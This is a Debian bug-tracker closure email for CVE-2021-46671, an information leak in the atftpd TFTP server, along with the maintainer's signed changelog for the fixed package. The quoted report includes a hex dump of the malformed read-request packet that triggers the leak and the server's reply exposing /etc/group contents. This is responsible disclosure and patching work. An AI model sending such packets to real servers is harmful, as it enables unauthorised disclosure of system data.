Your message dated Sun, 13 Feb 2022 17:47:07 +0000 with message-id <e1njixn-0005do...@fasolo.debian.org> and subject line Bug#1004974: fixed in atftp 0.7.git20120829-3.3+deb11u2 has caused the Debian Bug report #1004974, regarding atftpd: CVE-2021-46671: Potential information leak in atftpd<0.7.5 to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1004974: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1004974 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: atftpd Version: 0.7.git20120829-3.3+deb11u1 Severity: grave Tags: security Justification: user security hole X-Debbugs-Cc: debian_f7b...@jkrupp.de, Debian Security Team <t...@security.debian.org> Dear Maintainer, * What led up to the situation? During a research project we have found a potential information leak in the atftpd daemon from package atftpd, where malformed requests can lead to a (partial) leak of the contents of /etc/group. * What exactly did you do (or not do) that was effective (or ineffective)? Sent the following (malformed) packet: ``` 00000000: 0001 006e 6574 6173 6369 6900 7473 697a ...netascii.tsiz 00000010: 6500 78 e.x ``` * What was the outcome of this action? A freshly started atfptd server replies with a packet containing contents of /etc/group ``` 00000000: 0006 7473 697a 6500 7831 3a0a 6269 6e3a ..tsize.x1:.bin: 00000010: 783a 323a 0a73 7973 3a78 3a33 3a0a 6164 x:2:.sys:x:3:.ad 00000020: 6d3a 783a 343a 0a74 7479 3a78 3a35 3a0a m:x:4:.tty:x:5:. 00000030: 6469 736b 3a78 3a36 3a0a 6c70 3a78 3a37 disk:x:6:.lp:x:7 00000040: 3a0a 6d61 696c 3a78 3a38 3a0a 6e65 7773 :.mail:x:8:.news 00000050: 3a78 3a39 3a0a 7575 6370 3a78 3a31 303a :x:9:.uucp:x:10: 00000060: 0a6d 616e 3a78 3a31 323a 0a70 726f 7879 .man:x:12:.proxy 00000070: 3a78 3a31 333a 0a6b 6d65 6d3a 783a 3135 :x:13:.kmem:x:15 00000080: 3a0a 6469 616c 6f75 743a 783a 3230 3a0a :.dialout:x:20:. 00000090: 6661 783a 783a 3231 3a0a 766f 6963 653a fax:x:21:.voice: 000000a0: 783a 3232 3a0a 6364 726f 6d3a 783a 3234 x:22:.cdrom:x:24 000000b0: 3a0a 666c 6f70 7079 3a78 3a32 353a 0a74 :.floppy:x:25:.t 000000c0: 6170 653a 783a 3236 3a0a 7375 646f 3a78 ape:x:26:.sudo:x 000000d0: 3a32 373a 0a61 7564 696f 3a78 3a32 393a :27:.audio:x:29: 000000e0: 0a64 6970 3a78 3a33 303a 0a77 7777 2d64 .dip:x:30:.www-d 000000f0: 6174 613a 783a 3333 3a0a 6261 636b 7570 ata:x:33:.backup 00000100: 3a78 3a33 343a 0a00 :x:34:.. ``` * What outcome did you expect instead? No response or an error message from the server. It appears that this bug has been fixed upstream (commit 9cf799c40738722001552618518279e9f0ef62e5), and the fix is already included in atftpd version 0.7.git20210915-3 in debian testing). Yet we were able to reproduce this behavior on debian stable/bullseye (atftpd version 0.7.git20120829-3.3+deb11u1) and debian oldstable/buster (atftpd version 0.7.git20120829-3.2~deb10u2). Further, the issue appears to only occur when running atftpd in standalone mode (--daemon, not via inetd), and only on the very first request, as the buffer containing /etc/group data is overwritten by the new request. -- System Information: Debian Release: 11.2 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 5.10.0-9-amd64 (SMP w/1 CPU thread) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages atftpd depends on: ii debconf [debconf-2.0] 1.5.77 ii libc6 2.31-13+deb11u2 ii libpcre3 2:8.39-13 ii libwrap0 7.6.q-31 ii lsb-base 11.1.0 ii tcpd 7.6.q-31 ii update-inetd 4.51 Versions of packages atftpd recommends: ii rlinetd [inet-superserver] 0.9.3-1 Versions of packages atftpd suggests: ii logrotate 3.18.0-2 -- debconf information: atftpd/mcast_addr: 239.239.239.0-255 atftpd/multicast: true atftpd/logfile: /var/log/atftpd.log atftpd/maxthread: 100 atftpd/tftpd-timeout: 300 atftpd/logtofile: false atftpd/tsize: true atftpd/ttl: 1 atftpd/basedir: /srv/tftp atftpd/blksize: true atftpd/verbosity: 5 (LOG_NOTICE) atftpd/port: 69 atftpd/mcast_port: 1758 atftpd/use_inetd: true atftpd/retry-timeout: 5 atftpd/timeout: true
--- End Message ---
--- Begin Message ---Source: atftp Source-Version: 0.7.git20120829-3.3+deb11u2 Done: Andreas B. Mundt <a...@debian.org> We believe that the bug you reported is fixed in the latest version of atftp, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1004...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Andreas B. Mundt <a...@debian.org> (supplier of updated atftp package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Fri, 04 Feb 2022 18:09:05 +0100 Source: atftp Architecture: source Version: 0.7.git20120829-3.3+deb11u2 Distribution: bullseye Urgency: medium Maintainer: Ludovic Drolez <ldro...@debian.org> Changed-By: Andreas B. Mundt <a...@debian.org> Closes: 1004974 Changes: atftp (0.7.git20120829-3.3+deb11u2) bullseye; urgency=medium . * Fix for CVE-2021-46671 (Closes: #1004974) Checksums-Sha1: 5d7fef7cb81e36a4d12ae28c2269e92e42474d46 1832 atftp_0.7.git20120829-3.3+deb11u2.dsc f13f714db9d9f84864fc6bab86bcb103bfa6f593 39440 atftp_0.7.git20120829-3.3+deb11u2.diff.gz f19bc0ddad4244e5afc9e81ff7c6d686d2603d6b 6923 atftp_0.7.git20120829-3.3+deb11u2_amd64.buildinfo Checksums-Sha256: 3764a075405ae2f3d8b9d343f3366644526510028f7bacdc1802e635ef082007 1832 atftp_0.7.git20120829-3.3+deb11u2.dsc 254c2d93bb35cca2f68a46f687c70f3eaf5615fcb33948220278107ea8e02b68 39440 atftp_0.7.git20120829-3.3+deb11u2.diff.gz 622de6b25bd8d7d1d5c1b34316be049e2d5f4cd14ce8983aa24d5f4342530f0c 6923 atftp_0.7.git20120829-3.3+deb11u2_amd64.buildinfo Files: 77bbed144026f42f23fb99e4a007c9e7 1832 net extra atftp_0.7.git20120829-3.3+deb11u2.dsc b2fad174c22e5a6d307726be7affd13d 39440 net extra atftp_0.7.git20120829-3.3+deb11u2.diff.gz 3117cdaf41139a5ac407776bf3bcd935 6923 net extra atftp_0.7.git20120829-3.3+deb11u2_amd64.buildinfo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEk4pc7h4pDeJV2ayYsB/qhGF7WG0FAmH+QwQACgkQsB/qhGF7 WG0/vg/+O4q71PDXhtJdNyW/DAKmT5XBs60TlAl/uNwnlxGJM+6MOaqnmXZlC2/p XpkaWcq8QocVB0K+Jll4ZkvK4eso63f2Ee60n8L1TK3iGlEhtQqGBEn2QINIZX0b +LEnC9LdZ6ctVlw1xa79G23GOhroML4hRt/iHhCZxrJBzBg7ntzZnrVtJK5Tn5yG 023EFh6LHr1dSzzWY0hZLoYUFQcCsyQ9U4wNhDbkM+NLtCSYhEvX4brrHVh2O+6U MKG29zE4Wb3V02skhGZ7xXec6HWCIwgR/CxJxMy32gxrNhlx1pMa68cexIJTCdMt rSFcpT6XVAAoSUTV2CsSm2pBbfG4yS2pCr6eLLY0F+55Kw5UDErGpRNSY/eMjhiQ GmNee3wF0ja2l8KME1wPvSAD8CV5GJb1XuVpTeKw6qHHusiSv6S5G8/yNLLnWQf1 uc7Awz65RCsUtYEZXCCj0ORVII6wlnhMt1A/6KkdeoYPxcD/0LTR5e0VK8CzjzaT 5qpxLViaBHjM9e4NfNjLyqK0Mpl9viKFN58R/IePYstsWEcMciSpsgpm/TJYARvq POTsnlXboewWZEANiRgDjYRcD7skdiNM05KEaFsnirgL2BNWq2bY6/LNTSHKeW/l kMx562ifA0X3SF5yXCf1MK/AuNUa0gp1eI4iPXOkQqDIcCifRb4= =JenM -----END PGP SIGNATURE-----
--- End Message ---
